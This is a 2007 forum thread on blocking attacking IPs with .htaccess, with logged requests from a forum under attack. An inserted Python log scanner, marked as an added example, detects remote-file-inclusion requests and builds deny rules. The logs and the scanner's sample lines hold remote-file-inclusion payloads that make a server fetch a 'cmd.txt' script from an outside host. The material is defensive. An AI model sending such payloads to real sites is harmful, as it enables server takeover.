
Posted: Thu May 17, 2007 10:42 am
Author: Omni-Lee
"ZacFields" wrote: These IPs need to be blocked from .htaccess to prevent them from running requests on your forum's files.


Can you be more specific as to what type of requests? I assume you don't mean sql as that wouldn't be considered minor.

Re: Security Flaw

Posted: Thu May 17, 2007 4:50 pm
Author: Frost
He means any requests.

If you ban the IPs in htaccess in your root directory, they can't access anything beyond that point (your whole site is gone to them).

Note: if you put this in htaccess, say, 3 folders into your server, it only affects from then forward.

htaccess in root folder example

Access > [htaccess in root] > All Following Folders Denied

htaccess in later folder example

Access > Root > 2nd Folder > 3rd Folder > forum > [htaccess in forum] All Following Folders Denied

That way, an attacker would still have access to your root, 2nd, 3rd, and forum folders

That's how it works as far as I know

Posted: Thu May 17, 2007 5:09 pm
Author: ZacFields
Thanks Frost...I was kinda stumped a little when trying to think of how to explain a request.

Basically, when you open a page in a forum, it performs a GET request for all the pieces of that page: the images, includes.php, all the aspects of that page. When you make a post (pretty much anytime you press the "submit" button), it sends a POST request.

But for an example as to why you would want to ban things like this from .htaccess in your root: You all know what happens when you ban someone from your forum, right? Basically it opens up everything (all the requests still get performed) but IM software is written to recognize "hey, this guy is banned" and it sends them a nice little banned message saying that this site is banned.

But blocking from .htaccess, they can't even bother your server with requests because before they even get to your forums, or any file inside your forums your server itself recognizes that the IP is not supposed to be there so it actually prevents them from even seeing your site, or even performing any requests on the files in the same folder, or after your .htaccess file.

Hope that helps.

Zac

Posted: Thu May 17, 2007 7:54 pm
Author: Omni-Lee
Thank you both for the description.

CT is showing the attacks as slowing down, but they are still coming.

Today's:
17 May 2007 06:27 pm //includes/kb_constants.php?module_root_path=http://www.firp.it/smf/Themes/default/images/english/cmd.txt? libwww-perl/5.805 209.172.57.139

Another IP for the .htaccess file.

While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //<siteURL>//<siteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351 <siteURL> "http://<siteURL>//<siteURL>//<SiteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"

What do you make of it? It feels fishy, but I'd like confirmation.
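
Added example (not part of any post in this thread): a log scan for the request pattern in the CT entry above, where a query parameter such as module_root_path carries a remote URL, collecting the source IPs into root .htaccess deny lines of the kind Frost and ZacFields describe. The log lines, IPs and hostnames are constructed, the function names are hypothetical, and the deny syntax assumes Apache 2.2-style access control.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [17/May/2007:06:27:02 -0400] "GET //includes/kb_constants.php?module_root_path=http://files.example.net/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.23 - - [17/May/2007:06:30:11 -0400] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 8841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
203.0.113.7 - - [17/May/2007:06:31:40 -0400] "GET /forum/index.php?module_root_path=hTTp%3A%2F%2Ffiles.example.net%2Fcmd.txt%3F HTTP/1.1" 404 2351 "-" "libwww-perl/5.805"
192.0.2.50 - - [17/May/2007:07:02:09 -0400] "GET /forum/login.php?redirect=index.php HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Captures: client IP, method, request target, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# A parameter value that is itself a URL is the pattern in the CT entry.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def remote_include_params(query):
    """Names of query parameters whose percent-decoded value is a remote URL."""
    pairs = parse_qsl(query, keep_blank_values=True)  # decodes %3A%2F%2F etc.
    return [name for name, value in pairs if REMOTE_RE.match(value)]


def scan(log_text):
    """Map each source IP to its (path, parameter, status) hits."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        for name in remote_include_params(query):
            hits.setdefault(ip, []).append((path, name, int(status)))
    return hits


def htaccess_deny(hits):
    """Apache 2.2-style rules for the root .htaccess; Deny overrides Allow."""
    rules = ["Order Allow,Deny", "Allow from all"]
    rules += [f"Deny from {ip}" for ip in sorted(hits)]
    return "\n".join(rules)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, entries in found.items():
        print(ip, entries)  # 200 = request was served; review that script first
    print(htaccess_deny(found))
```

The check also flags legitimate parameters that carry full URLs, such as redirect targets, so review the hits before adding an IP to the deny list.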

Posted: Fri May 18, 2007 8:40 am
Author: nGAGE
"Omni-Lee" wrote: While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351 http://www.mithrilcrowns.net "http://www.mithrilcrowns.net//www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"

What do you make of it? It feels fishy, but I'd like confirmation.

Looks like somebody's profile is being used to GET something through there or something... dunno, and I'm not gonna go to that link either ;)